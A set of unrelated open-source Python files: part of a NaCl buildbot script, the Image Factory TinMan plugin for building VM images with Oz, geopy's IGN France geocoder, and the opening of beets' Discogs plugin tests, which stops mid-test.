parser.add_option('--browser_path', dest='browser_path', action='store',
type='string', default=None,
help='Path to the chrome browser.')
parser.add_option('--buildbot', dest='buildbot', action='store',
type='string', default=None,
help='Value passed to scons as buildbot= option.')
return parser
def Main():
parser = MakeCommandLineParser()
options, args = parser.parse_args()
if options.integration_bot and options.morenacl_bot:
parser.error('ERROR: cannot be both an integration bot and a morenacl bot')
# Set defaults for enabling newlib.
if options.enable_newlib == -1:
options.enable_newlib = 1
# Set defaults for enabling glibc.
if options.enable_glibc == -1:
if options.integration_bot or options.morenacl_bot:
options.enable_glibc = 1
else:
options.enable_glibc = 0
if args:
parser.error('ERROR: invalid argument')
BuildAndTest(options)
if __name__ == '__main__':
Main()
|
|
#
# Copyright 2011 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import zope
import oz.GuestFactory
import oz.TDL
import oz.ozutil
import subprocess
import libxml2
import traceback
import ConfigParser
import base64
from os.path import isfile
from time import *
from tempfile import NamedTemporaryFile
from imgfac.ApplicationConfiguration import ApplicationConfiguration
from imgfac.ImageFactoryException import ImageFactoryException
from imgfac.ReservationManager import ReservationManager
from imgfac.FactoryUtils import launch_inspect_and_mount, shutdown_and_close, remove_net_persist
from imgfac.OSDelegate import OSDelegate
from imgfac.FactoryUtils import parameter_cast_to_bool
from libvirt import libvirtError
from oz.OzException import OzException
import json
def subprocess_check_output(*popenargs, **kwargs):
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
process = subprocess.Popen(stdout=subprocess.PIPE, stderr=subprocess.STDOUT, *popenargs, **kwargs)
stdout, stderr = process.communicate()
retcode = process.poll()
if retcode:
cmd = ' '.join(*popenargs)
raise ImageFactoryException("'%s' failed(%d): %s" % (cmd, retcode, stderr))
return (stdout, stderr, retcode)
class TinMan(object):
zope.interface.implements(OSDelegate)
def activity(self, activity):
# Simple helper function
# Activity should be a one line human-readable string indicating the task in progress
# We log it at DEBUG and also set it as the status_detail on our active image
self.log.debug(activity)
self.active_image.status_detail['activity'] = activity
## INTERFACE METHOD
def create_target_image(self, builder, target, base_image, parameters):
self.log.info('create_target_image() called for TinMan plugin - creating a TargetImage')
self.active_image = builder.target_image
self.target = target
self.base_image = builder.base_image
# populate our target_image bodyfile with the original base image
# which we do not want to modify in place
self.activity("Copying BaseImage to modifiable TargetImage")
self.log.debug("Copying base_image file (%s) to new target_image file (%s)" % (builder.base_image.data, builder.target_image.data))
oz.ozutil.copyfile_sparse(builder.base_image.data, builder.target_image.data)
self.image = builder.target_image.data
# Merge together any TDL-style customizations requested via our plugin-to-plugin interface
# with any target specific packages, repos and commands and then run a second Oz customization
# step.
self.tdlobj = oz.TDL.TDL(xmlstring=builder.base_image.template, rootpw_required=self.app_config["tdl_require_root_pw"])
# We remove any packages, commands and files from the original TDL - these have already been
# installed/executed. We leave the repos in place, as it is possible that the target
# specific packages or commands may require them.
self.tdlobj.packages = [ ]
self.tdlobj.commands = { }
self.tdlobj.files = { }
# This is user-defined target-specific packages and repos in a local config file
self.add_target_content()
# This is content deposited by cloud plugins - typically commands to run to prep the image further
self.merge_cloud_plugin_content()
# If there are no new commands, packages or files, we can stop here - there is no need to run Oz again
if (len(self.tdlobj.packages) + len(self.tdlobj.commands) + len(self.tdlobj.files)) == 0:
self.log.debug("No further modification of the TargetImage to perform in the OS Plugin - returning")
return
# We have some additional work to do - create a new Oz guest object that we can use to run the guest
# customization a second time
self._init_oz()
self.guest.diskimage = builder.target_image.data
libvirt_xml = self.guest._generate_xml("hd", None)
# One last step is required here - The persistent net rules in some Fedora and RHEL versions
# Will cause our new incarnation of the image to fail to get network - fix that here
# We unfortunately end up having to duplicate this a second time in the cloud plugins
# when we are done with our second stage customizations
# TODO: Consider moving all of that back here
guestfs_handle = launch_inspect_and_mount(builder.target_image.data)
remove_net_persist(guestfs_handle)
shutdown_and_close(guestfs_handle)
try:
self.log.debug("Doing second-stage target_image customization and ICICLE generation")
#self.percent_complete = 30
builder.target_image.icicle = self.guest.customize_and_generate_icicle(libvirt_xml)
self.log.debug("Customization and ICICLE generation complete")
#self.percent_complete = 50
finally:
self.activity("Cleaning up install artifacts")
self.guest.cleanup_install()
def add_cloud_plugin_content(self, content):
# This is a method that cloud plugins can call to deposit content/commands to be run
# during the OS-specific first stage of the Target Image creation.
# The expected input is a dict containing commands and files
# No support for repos at the moment as these introduce external deps that we may not be able to count on
# Add this to an array which will later be merged into the TDL object used to drive Oz
self.cloud_plugin_content.append(content)
def merge_cloud_plugin_content(self):
for content in self.cloud_plugin_content:
if 'files' in content:
for fileentry in content['files']:
if not 'name' in fileentry:
raise ImageFactoryException("File given without a name")
if not 'type' in fileentry:
raise ImageFactoryException("File given without a type")
if not 'file' in fileentry:
raise ImageFactoryException("File given without any content")
if fileentry['type'] == 'raw':
self.tdlobj.files[fileentry['name']] = fileentry['file']
elif fileentry['type'] == 'base64':
if len(fileentry['file']) == 0:
self.tdlobj.files[fileentry['name']] = ""
else:
self.tdlobj.files[fileentry['name']] = base64.b64decode(fileentry['file'])
else:
raise ImageFactoryException("File given with invalid type (%s)" % (fileentry['type']))
if 'commands' in content:
for command in content['commands']:
if not 'name' in command:
raise ImageFactoryException("Command given without a name")
if not 'type' in command:
raise ImageFactoryException("Command given without a type")
if not 'command' in command:
raise ImageFactoryException("Command given without any content")
if command['type'] == 'raw':
self.tdlobj.commands[command['name']] = command['command']
elif command['type'] == 'base64':
if len(command['command']) == 0:
self.log.warning("Command with zero length given")
self.tdlobj.commands[command['name']] = ""
else:
self.tdlobj.commands[command['name']] = base64.b64decode(command['command'])
else:
raise ImageFactoryException("Command given with invalid type (%s)" % (command['type']))
def add_target_content(self):
"""Merge in target specific package and repo content.
TDL object must already exist as self.tdlobj"""
doc = None
if isfile("/etc/imagefactory/target_content.xml"):
doc = libxml2.parseFile("/etc/imagefactory/target_content.xml")
else:
self.log.debug("Found neither a call-time config nor a config file - doing nothing")
return
# Purely to make the xpath statements below a tiny bit shorter
target = self.target
os=self.tdlobj.distro
version=self.tdlobj.update
arch=self.tdlobj.arch
# We go from most to least specific in this order:
# arch -> version -> os-> target
# Note that at the moment we even allow an include statment that covers absolutely everything.
# That is, one that doesn't even specify a target - this is to support a very simple call-time syntax
include = doc.xpathEval("/template_includes/include[@target='%s' and @os='%s' and @version='%s' and @arch='%s']" %
(target, os, version, arch))
if len(include) == 0:
include = doc.xpathEval("/template_includes/include[@target='%s' and @os='%s' and @version='%s' and not(@arch)]" %
(target, os, version))
if len(include) == 0:
include = doc.xpathEval("/template_includes/include[@target='%s' and @os='%s' and not(@version) and not(@arch)]" %
(target, os))
if len(include) == 0:
include = doc.xpathEval("/template_includes/include[@target='%s' and not(@os) and not(@version) and not(@arch)]" %
(target))
if len(include) == 0:
include = doc.xpathEval("/template_includes/include[not(@target) and not(@os) and not(@version) and not(@arch)]")
if len(include) == 0:
self.log.debug("cannot find a config section that matches our build details - doing nothing")
return
# OK - We have at least one config block that matches our build - take the first one, merge it and be done
# TODO: Merge all of them? Err out if there is more than one? Warn?
include = include[0]
packages = include.xpathEval("packages")
if len(packages) > 0:
self.tdlobj.merge_packages(str(packages[0]))
repositories = include.xpathEval("repositories")
if len(repositories) > 0:
self.tdlobj.merge_repositories(str(repositories[0]))
def __init__(self):
super(TinMan, self).__init__()
self.cloud_plugin_content = [ ]
config_obj = ApplicationConfiguration()
self.app_config = config_obj.configuration
self.res_mgr = ReservationManager()
self.log = logging.getLogger('%s.%s' % (__name__, self.__class__.__name__))
self.parameters = None
self.install_script_object = None
self.guest = None
def abort(self):
self.log.debug("ABORT called in TinMan plugin")
# If we have an active Oz VM destroy it - if not do nothing but log why we did nothing
if not self.guest:
self.log.debug("No Oz guest object present - nothing to do")
return
try:
# Oz doesn't keep the active domain object as an instance variable so we have to look it up
guest_dom = self.guest.libvirt_conn.lookupByName(self.tdlobj.name)
except Exception, e:
self.log.exception(e)
self.log.debug("No Oz VM found with name (%s) - nothing to do" % (self.tdlobj.name))
self.log.debug("This likely means the local VM has already been destroyed or never started")
return
try:
self.log.debug("Attempting to destroy local guest/domain (%s)" % (self.tdlobj.name))
guest_dom.destroy()
except Exception, e:
self.log.exception(e)
self.log.warning("Exception encountered while destroying domain - it may still exist")
def _init_oz(self):
# TODO: This is a convenience variable for refactoring - rename
self.new_image_id = self.active_image.identifier
# Create a name combining the TDL name and the UUID for use when tagging EC2 AMIs
self.longname = self.tdlobj.name + "-" + self.new_image_id
# Oz assumes unique names - TDL built for multiple backends guarantees they are not unique
# We don't really care about the name so just force uniqueness
# 18-Jul-2011 - Moved to constructor and modified to change TDL object name itself
# Oz now uses the tdlobject name property directly in several places so we must change it
self.tdlobj.name = "factory-build-" + self.new_image_id
# populate a config object to pass to OZ; this allows us to specify our
# own output dir but inherit other Oz behavior
self.oz_config = ConfigParser.SafeConfigParser()
if self.oz_config.read("/etc/oz/oz.cfg") != []:
if self.parameters.get("oz_overrides", None) != None:
oz_overrides = json.loads(self.parameters.get("oz_overrides",None).replace("'", "\""))
for i in oz_overrides:
for key,val in oz_overrides[i].items():
self.oz_config.set(i, key, str(val))
self.oz_config.set('paths', 'output_dir', self.app_config["imgdir"])
if "oz_data_dir" in self.app_config:
self.oz_config.set('paths', 'data_dir', self.app_config["oz_data_dir"])
if "oz_screenshot_dir" in self.app_config:
self.oz_config.set('paths', 'screenshot_dir', self.app_config["oz_screenshot_dir"])
print "=============== Final Oz Config ================"
for section in self.oz_config.sections():
print "[ {0} ]".format(section)
for option in self.oz_config.options(section):
print " {0} = {1}".format(option, self.oz_config.get(section,option))
else:
raise ImageFactoryException("No Oz config file found. Can't continue.")
# make this a property to enable quick cleanup on abort
self.instance = None
# Here we are always dealing with a local install
self.init_guest()
## INTERFACE METHOD
def create_base_image(self, builder, template, parameters):
self.log.info('create_base_image() called for TinMan plugin - creating a BaseImage')
self.tdlobj = oz.TDL.TDL(xmlstring=template.xml, rootpw_required=self.app_config["tdl_require_root_pw"])
if parameters:
self.parameters = parameters
else:
self.parameters = { }
# TODO: Standardize reference scheme for the persistent image objects in our builder
# Having local short-name copies like this may well be a good idea though they
# obscure the fact that these objects are in a container "upstream" of our plugin object
self.base_image = builder.base_image
# Set to the image object that is actively being created or modified
# Used in the logging helper function above
self.active_image = self.base_image
try:
self._init_oz()
self.guest.diskimage = self.base_image.data
self.activity("Cleaning up any old Oz guest")
self.guest.cleanup_old_guest()
self.activity("Generating JEOS install media")
self.threadsafe_generate_install_media(self.guest)
self.percent_complete=10
# We want to save this later for use by RHEV-M and Condor clouds
libvirt_xml=""
gfs = None
try:
self.activity("Generating JEOS disk image")
# Newer Oz versions introduce a configurable disk size in TDL
# We must still detect that it is present and pass it in this call
try:
disksize=getattr(self.guest, "disksize")
except AttributeError:
disksize = 10
self.guest.generate_diskimage(size = disksize)
# TODO: If we already have a base install reuse it
# subject to some rules about updates to underlying repo
self.activity("Execute JEOS install")
libvirt_xml = self.guest.install(self.app_config["timeout"])
self.base_image.parameters['libvirt_xml'] = libvirt_xml
self.image = self.guest.diskimage
self.log.debug("Base install complete - Doing customization and ICICLE generation")
self.percent_complete = 30
# Power users may wish to avoid ever booting the guest after the installer is finished
# They can do so by passing in a { "generate_icicle": False } KV pair in the parameters dict
if parameter_cast_to_bool(self.parameters.get("generate_icicle", True)):
if parameter_cast_to_bool(self.parameters.get("offline_icicle", False)):
self.guest.customize(libvirt_xml)
gfs = launch_inspect_and_mount(self.image, readonly=True)
# Monkey-patching is bad
# TODO: Work with Chris to incorporate a more elegant version of this into Oz itself
def libguestfs_execute_command(gfs, cmd, timeout):
stdout = gfs.sh(cmd)
return (stdout, None, 0)
self.guest.guest_execute_command = libguestfs_execute_command
builder.base_image.icicle = self.guest.do_icicle(gfs)
else:
builder.base_image.icicle = self.guest.customize_and_generate_icicle(libvirt_xml)
else:
self.guest.customize(libvirt_xml)
self.log.debug("Customization and ICICLE generation complete")
self.percent_complete = 50
finally:
self.activity("Cleaning up install artifacts")
if self.guest:
self.guest.cleanup_install()
if self.install_script_object:
# NamedTemporaryFile - removed on close
self.install_script_object.close()
if gfs:
shutdown_and_close(gfs)
self.log.debug("Generated disk image (%s)" % (self.guest.diskimage))
# OK great, we now have a customized KVM image
finally:
pass
# TODO: Create the base_image object representing this
# TODO: Create the base_image object at the beginning and then set the diskimage accordingly
def init_guest(self):
# Use the factory function from Oz directly
# This raises an exception if the TDL contains an unsupported distro or version
# Cloud plugins that use KVM directly, such as RHEV-M and openstack-kvm can accept
# any arbitrary guest that Oz is capable of producing
install_script_name = None
install_script = self.parameters.get("install_script", None)
if install_script:
self.install_script_object = NamedTemporaryFile()
self.install_script_object.write(install_script)
self.install_script_object.flush()
install_script_name = self.install_script_object.name
try:
self.guest = oz.GuestFactory.guest_factory(self.tdlobj, self.oz_config, install_script_name)
# Oz just selects a random port here - This could potentially collide if we are unlucky
self.guest.listen_port = self.res_mgr.get_next_listen_port()
except libvirtError, e:
raise ImageFactoryException("Cannot connect to libvirt. Make sure libvirt is running. [Original message: %s]" % e.message)
except OzException, e:
if "Unsupported" in e.message:
raise ImageFactoryException("TinMan plugin does not support distro (%s) update (%s) in TDL" % (self.tdlobj.distro, self.tdlobj.update) )
else:
raise e
def log_exc(self):
self.log.debug("Exception caught in ImageFactory")
self.log.debug(traceback.format_exc())
self.active_image.status_detal['error'] = traceback.format_exc()
def threadsafe_generate_install_media(self, guest):
# Oz caching of install media and modified install media is not thread safe
# Make it safe here using some locks
# We can only have one active generate_install_media() call for each unique tuple:
# (OS, update, architecture, installtype)
tdl = guest.tdl
queue_name = "%s-%s-%s-%s" % (tdl.distro, tdl.update, tdl.arch, tdl.installtype)
self.res_mgr.get_named_lock(queue_name)
try:
guest.generate_install_media(force_download=False)
finally:
self.res_mgr.release_named_lock(queue_name)
|
|
"""
:class:`.IGNFrance` is the IGN France Geocoder.
"""
import xml.etree.ElementTree as ET
from geopy.compat import (urlencode, HTTPPasswordMgrWithDefaultRealm,
HTTPBasicAuthHandler, build_opener, u,
install_opener, iteritems, Request)
from geopy.geocoders.base import Geocoder, DEFAULT_TIMEOUT, DEFAULT_SCHEME
from geopy.exc import (
GeocoderQueryError,
ConfigurationError,
)
from geopy.location import Location
from geopy.util import logger
__all__ = ("IGNFrance", )
class IGNFrance(Geocoder): # pylint: disable=W0223
"""
Geocoder using the IGN France GeoCoder OpenLS API. Documentation at:
http://api.ign.fr/tech-docs-js/fr/developpeur/search.html
"""
xml_request = """<?xml version="1.0" encoding="UTF-8"?>
<XLS version="1.2"
xmlns="http://www.opengis.net/xls"
xmlns:gml="http://www.opengis.net/gml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.opengis.net/xls
http://schemas.opengis.net/ols/1.2/olsAll.xsd">
<RequestHeader srsName="epsg:4326"/>
<Request methodName="{method_name}"
maximumResponses="{maximum_responses}"
requestID=""
version="1.2">
{sub_request}
</Request>
</XLS>"""
def __init__(
self,
api_key,
username=None,
password=None,
referer=None,
domain='wxs.ign.fr',
scheme=DEFAULT_SCHEME,
timeout=DEFAULT_TIMEOUT,
proxies=None,
): # pylint: disable=R0913
"""
Initialize a customized IGN France geocoder.
:param string api_key: The API key required by IGN France API
to perform geocoding requests. You can get your key here:
http://api.ign.fr. Mandatory. For authentication with referer
and with username/password, the api key always differ.
:param string username: When making a call need HTTP simple
authentication username. Mandatory if no referer set
:param string password: When making a call need HTTP simple
authentication password. Mandatory if no referer set
:param string referer: When making a call need HTTP referer.
Mandatory if no password and username
:param string domain: Currently it is 'wxs.ign.fr', can
be changed for testing purposes for developer API
e.g gpp3-wxs.ign.fr at the moment.
:param string scheme: Use 'https' or 'http' as the API URL's scheme.
Default is https. Note that SSL connections' certificates are not
verified.
:param int timeout: Time, in seconds, to wait for the geocoding service
to respond before raising a :class:`geopy.exc.GeocoderTimedOut`
exception. Set this only if you wish to override, on this call
only, the value set during the geocoder's initialization.
:param dict proxies: If specified, routes this geocoder's requests
through the specified proxy. E.g., {"https": "192.0.2.0"}. For
more information, see documentation on
:class:`urllib2.ProxyHandler`.
"""
super(IGNFrance, self).__init__(
scheme=scheme, timeout=timeout, proxies=proxies
)
# Catch if no api key with username and password
# or no api key with referer
if not (api_key and username and password) \
and not (api_key and referer):
raise ConfigurationError('You should provide an api key and a '
'username with a password or an api '
'key with a referer depending on '
'created api key')
if (username and password) and referer:
raise ConfigurationError('You can\'t set username/password and '
'referer together. The API key always '
'differs depending on both scenarios')
if username and not password:
raise ConfigurationError(
'username and password must be set together'
)
self.api_key = api_key
self.username = username
self.password = password
self.referer = referer
self.domain = domain.strip('/')
self.api = "{scheme}://{domain}/{api_key}/geoportail/ols".format(
scheme=self.scheme,
api_key=self.api_key,
domain=self.domain
)
if username and password and referer is None:
self.addSimpleHTTPAuthHeader()
def geocode(
self,
query,
query_type='StreetAddress',
maximum_responses=25,
is_freeform=False,
filtering=None,
exactly_one=True,
timeout=None
): # pylint: disable=W0221,R0913
"""
Geocode a location query.
:param string query: The query string to be geocoded.
:param string query_type: The type to provide for geocoding. It can be
PositionOfInterest, StreetAddress or CadastralParcel.
StreetAddress is the default choice if none provided.
:param int maximum_responses: The maximum number of responses
to ask to the API in the query body.
:param string is_freeform: Set if return is structured with
freeform structure or a more structured returned.
By default, value is False.
:param string filtering: Provide string that help setting geocoder
filter. It contains an XML string. See examples in documentation
and ignfrance.py file in directory tests.
:param bool exactly_one: Return one result or a list of results, if
available.
:param int timeout: Time, in seconds, to wait for the geocoding service
to respond before raising a :class:`geopy.exc.GeocoderTimedOut`
exception. Set this only if you wish to override, on this call
only, the value set during the geocoder's initialization.
"""
# Check if acceptable query type
if query_type not in ['PositionOfInterest',
'StreetAddress',
'CadastralParcel']:
raise GeocoderQueryError("""You did not provided a query_type the
webservice can consume. It should be PositionOfInterest,
'StreetAddress or CadastralParcel""")
# Check query validity for CadastralParcel
if query_type == 'CadastralParcel' and len(query.strip()) != 14:
raise GeocoderQueryError("""You must send a string of fourteen
characters long to match the cadastre required code""")
sub_request = """
<GeocodeRequest returnFreeForm="{is_freeform}">
<Address countryCode="{query_type}">
<freeFormAddress>{query}</freeFormAddress>
{filtering}
</Address>
</GeocodeRequest>
"""
xml_request = self.xml_request.format(
method_name='LocationUtilityService',
sub_request=sub_request,
maximum_responses=maximum_responses
)
# Manage type change for xml case sensitive
if is_freeform:
is_freeform = 'true'
else:
is_freeform = 'false'
# Manage filtering value
if filtering is None:
filtering = ''
# Create query using parameters
request_string = xml_request.format(
is_freeform=is_freeform,
query=query,
query_type=query_type,
filtering=filtering
)
params = {
'xls': request_string
}
url = "?".join((self.api, urlencode(params)))
logger.debug("%s.geocode: %s", self.__class__.__name__, url)
raw_xml = self._request_raw_content(url, timeout)
return self._parse_xml(
raw_xml,
is_freeform=is_freeform,
exactly_one=exactly_one
)
def reverse(
self,
query,
reverse_geocode_preference=('StreetAddress', ),
maximum_responses=25,
filtering='',
exactly_one=False,
timeout=None
): # pylint: disable=W0221,R0913
"""
Given a point, find an address.
:param query: The coordinates for which you wish to obtain the
closest human-readable addresses.
:type query: :class:`geopy.point.Point`, list or tuple of (latitude,
longitude), or string as "%(latitude)s, %(longitude)s"
:param list reverse_geocode_preference: Enable to set expected results
type. It can be StreetAddress or PositionOfInterest.
Default is set to StreetAddress
:param int maximum_responses: The maximum number of responses
to ask to the API in the query body.
:param string filtering: Provide string that help setting geocoder
filter. It contains an XML string. See examples in documentation
and ignfrance.py file in directory tests.
:param boolean exactly_one: Return one result or a list of results, if
available.
:param int timeout: Time, in seconds, to wait for the geocoding service
to respond before raising a :class:`geopy.exc.GeocoderTimedOut`
exception. Set this only if you wish to override, on this call
only, the value set during the geocoder's initialization.
"""
sub_request = """
<ReverseGeocodeRequest>
{reverse_geocode_preference}
<Position>
<gml:Point>
<gml:pos>{query}</gml:pos>
</gml:Point>
{filtering}
</Position>
</ReverseGeocodeRequest>
"""
xml_request = self.xml_request.format(
method_name='ReverseGeocodeRequest',
sub_request=sub_request,
maximum_responses=maximum_responses
)
for pref in reverse_geocode_preference:
if pref not in ('StreetAddress', 'PositionOfInterest'):
raise GeocoderQueryError(
'`reverse_geocode_preference` must contain '
'one or more of: StreetAddress, PositionOfInterest'
)
point = self._coerce_point_to_string(query).replace(',', ' ')
reverse_geocode_preference = '\n'.join((
'<ReverseGeocodePreference>%s</ReverseGeocodePreference>' % pref
for pref
in reverse_geocode_preference
))
request_string = xml_request.format(
maximum_responses=maximum_responses,
query=point,
reverse_geocode_preference=reverse_geocode_preference,
filtering=filtering
)
url = "?".join((self.api, urlencode({'xls': request_string})))
logger.debug("%s.reverse: %s", self.__class__.__name__, url)
raw_xml = self._request_raw_content(url, timeout)
return self._parse_xml(
raw_xml,
exactly_one=exactly_one,
is_reverse=True,
is_freeform='false'
)
def addSimpleHTTPAuthHeader(self):
"""
Create Urllib request object embedding HTTP simple authentication
"""
sub_request = """
<GeocodeRequest returnFreeForm="{is_freeform}">
<Address countryCode="{query_type}">
<freeFormAddress>{query}</freeFormAddress>
</Address>
</GeocodeRequest>
"""
xml_request = self.xml_request.format(
method_name='LocationUtilityService',
sub_request=sub_request,
maximum_responses=1
)
# Create query using parameters
request_string = xml_request.format(
is_freeform='false',
query='rennes',
query_type='PositionOfInterest'
)
params = {
'xls': request_string
}
top_level_url = "?".join((self.api, urlencode(params)))
password_mgr = HTTPPasswordMgrWithDefaultRealm()
# Add the username and password.
# If we knew the realm, we could use it instead of None.
password_mgr.add_password(
None,
top_level_url,
self.username,
self.password
)
handler = HTTPBasicAuthHandler(password_mgr)
# create "opener" (OpenerDirector instance)
opener = build_opener(handler)
# Install the opener.
# Now all calls to urllib.request.urlopen use our opener.
install_opener(opener)
def _parse_xml(self,
page,
is_reverse=False,
is_freeform=False,
exactly_one=True):
"""
Returns location, (latitude, longitude) from XML feed
and transform to json
"""
# Parse the page
tree = ET.fromstring(page.encode('utf-8'))
# Clean tree from namespace to facilitate XML manipulation
def remove_namespace(doc, namespace):
"""Remove namespace in the document in place."""
ns = '{%s}' % namespace
ns = u(ns)
nsl = len(ns)
for elem in doc.getiterator():
if elem.tag.startswith(ns):
elem.tag = elem.tag[nsl:]
remove_namespace(tree, 'http://www.opengis.net/gml')
remove_namespace(tree, 'http://www.opengis.net/xls')
remove_namespace(tree, 'http://www.opengis.net/xlsext')
# Return places as json instead of XML
places = self._xml_to_json_places(tree, is_reverse=is_reverse)
if exactly_one:
return self._parse_place(places[0], is_freeform=is_freeform)
else:
return [
self._parse_place(
place,
is_freeform=is_freeform
) for place in places
]
@staticmethod
def _xml_to_json_places(tree, is_reverse=False):
"""
Transform the xml ElementTree due to XML webservice return to json
"""
select_multi = (
'GeocodedAddress'
if not is_reverse
else 'ReverseGeocodedLocation'
)
adresses = tree.findall('.//' + select_multi)
places = []
sel_pl = './/Address/Place[@type="{}"]'
for adr in adresses:
el = {}
el['pos'] = adr.find('./Point/pos')
el['street'] = adr.find('.//Address/StreetAddress/Street')
el['freeformaddress'] = adr.find('.//Address/freeFormAddress')
el['municipality'] = adr.find(sel_pl.format('Municipality'))
el['numero'] = adr.find(sel_pl.format('Numero'))
el['feuille'] = adr.find(sel_pl.format('Feuille'))
el['section'] = adr.find(sel_pl.format('Section'))
el['departement'] = adr.find(sel_pl.format('Departement'))
el['commune_absorbee'] = adr.find(sel_pl.format('CommuneAbsorbee'))
el['commune'] = adr.find(sel_pl.format('Commune'))
el['insee'] = adr.find(sel_pl.format('INSEE'))
el['qualite'] = adr.find(sel_pl.format('Qualite'))
el['territoire'] = adr.find(sel_pl.format('Territoire'))
el['id'] = adr.find(sel_pl.format('ID'))
el['id_tr'] = adr.find(sel_pl.format('ID_TR'))
el['bbox'] = adr.find(sel_pl.format('Bbox'))
el['nature'] = adr.find(sel_pl.format('Nature'))
el['postal_code'] = adr.find('.//Address/PostalCode')
el['extended_geocode_match_code'] = adr.find(
'.//ExtendedGeocodeMatchCode'
)
place = {}
def testContentAttrib(selector, key):
"""
Helper to select by attribute and if not attribute,
value set to empty string
"""
return selector.attrib.get(
key,
None
) if selector is not None else None
place['accuracy'] = testContentAttrib(
adr.find('.//GeocodeMatchCode'), 'accuracy')
place['match_type'] = testContentAttrib(
adr.find('.//GeocodeMatchCode'), 'matchType')
place['building'] = testContentAttrib(
adr.find('.//Address/StreetAddress/Building'), 'number')
place['search_centre_distance'] = testContentAttrib(
adr.find('.//SearchCentreDistance'), 'value')
for key, value in iteritems(el):
if value is not None:
place[key] = value.text
if value.text == None:
place[key] = None
else:
place[key] = None
# We check if lat lng is not empty and unpack accordingly
if place['pos']:
lat, lng = place['pos'].split(' ')
place['lat'] = lat.strip()
place['lng'] = lng.strip()
else:
place['lat'] = place['lng'] = None
# We removed the unused key
place.pop("pos", None)
places.append(place)
return places
def _request_raw_content(self, url, timeout):
"""
Send the request to get raw content.
"""
request = Request(url)
if self.referer is not None:
request.add_header('Referer', self.referer)
raw_xml = self._call_geocoder(
request,
timeout=timeout,
deserializer=None
)
return raw_xml
@staticmethod
def _parse_place(place, is_freeform=None):
"""
Get the location, lat, lng and place from a single json place.
"""
# When freeform already so full adress
if is_freeform == 'true':
location = place.get('freeformaddress')
else:
# For parcelle
if place.get('numero'):
location = place.get('street')
else:
# When classic geocoding
# or when reverse geocoding
location = "%s %s" % (
place.get('postal_code', ''),
place.get('commune', ''),
)
if place.get('street'):
location = "%s, %s" % (
place.get('street', ''),
location,
)
if place.get('building'):
location = "%s %s" % (
place.get('building', ''),
location,
)
return Location(location, (place.get('lat'), place.get('lng')), place)
|
|
# -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Tests for discogs plugin.
"""
from __future__ import division, absolute_import, print_function
import unittest
from test import _common
from test._common import Bag
from test.helper import capture_log
from beetsplug.discogs import DiscogsPlugin
class DGAlbumInfoTest(_common.TestCase):
def _make_release(self, tracks=None):
"""Returns a Bag that mimics a discogs_client.Release. The list
of elements on the returned Bag is incomplete, including just
those required for the tests on this class."""
data = {
'id': 'ALBUM ID',
'uri': 'https://www.discogs.com/release/release/13633721',
'title': 'ALBUM TITLE',
'year': '3001',
'artists': [{
'name': 'ARTIST NAME',
'id': 'ARTIST ID',
'join': ','
}],
'formats': [{
'descriptions': ['FORMAT DESC 1', 'FORMAT DESC 2'],
'name': 'FORMAT',
'qty': 1
}],
'styles': [
'STYLE1', 'STYLE2'
],
'genres': [
'GENRE1', 'GENRE2'
],
'labels': [{
'name': 'LABEL NAME',
'catno': 'CATALOG NUMBER',
}],
'tracklist': []
}
if tracks:
for recording in tracks:
data['tracklist'].append(recording)
return Bag(data=data,
# Make some fields available as properties, as they are
# accessed by DiscogsPlugin methods.
title=data['title'],
artists=[Bag(data=d) for d in data['artists']])
def _make_track(self, title, position='', duration='', type_=None):
track = {
'title': title,
'position': position,
'duration': duration
}
if type_ is not None:
# Test samples on discogs_client do not have a 'type_' field, but
# the API seems to return it. Values: 'track' for regular tracks,
# 'heading' for descriptive texts (ie. not real tracks - 12.13.2).
track['type_'] = type_
return track
def _make_release_from_positions(self, positions):
"""Return a Bag that mimics a discogs_client.Release with a
tracklist where tracks have the specified `positions`."""
tracks = [self._make_track('TITLE%s' % i, position) for
(i, position) in enumerate(positions, start=1)]
return self._make_release(tracks)
def test_parse_media_for_tracks(self):
tracks = [self._make_track('TITLE ONE', '1', '01:01'),
self._make_track('TITLE TWO', '2', '02:02')]
release = self._make_release(tracks=tracks)
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(d.media, 'FORMAT')
self.assertEqual(t[0].media, d.media)
self.assertEqual(t[1].media, d.media)
def test_parse_medium_numbers_single_medium(self):
release = self._make_release_from_positions(['1', '2'])
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(d.mediums, 1)
self.assertEqual(t[0].medium, 1)
self.assertEqual(t[0].medium_total, 2)
self.assertEqual(t[1].medium, 1)
self.assertEqual(t[0].medium_total, 2)
def test_parse_medium_numbers_two_mediums(self):
release = self._make_release_from_positions(['1-1', '2-1'])
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(d.mediums, 2)
self.assertEqual(t[0].medium, 1)
self.assertEqual(t[0].medium_total, 1)
self.assertEqual(t[1].medium, 2)
self.assertEqual(t[1].medium_total, 1)
def test_parse_medium_numbers_two_mediums_two_sided(self):
release = self._make_release_from_positions(['A1', 'B1', 'C1'])
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(d.mediums, 2)
self.assertEqual(t[0].medium, 1)
self.assertEqual(t[0].medium_total, 2)
self.assertEqual(t[0].medium_index, 1)
self.assertEqual(t[1].medium, 1)
self.assertEqual(t[1].medium_total, 2)
self.assertEqual(t[1].medium_index, 2)
self.assertEqual(t[2].medium, 2)
self.assertEqual(t[2].medium_total, 1)
self.assertEqual(t[2].medium_index, 1)
def test_parse_track_indices(self):
release = self._make_release_from_positions(['1', '2'])
d = DiscogsPlugin().get_album_info(release)
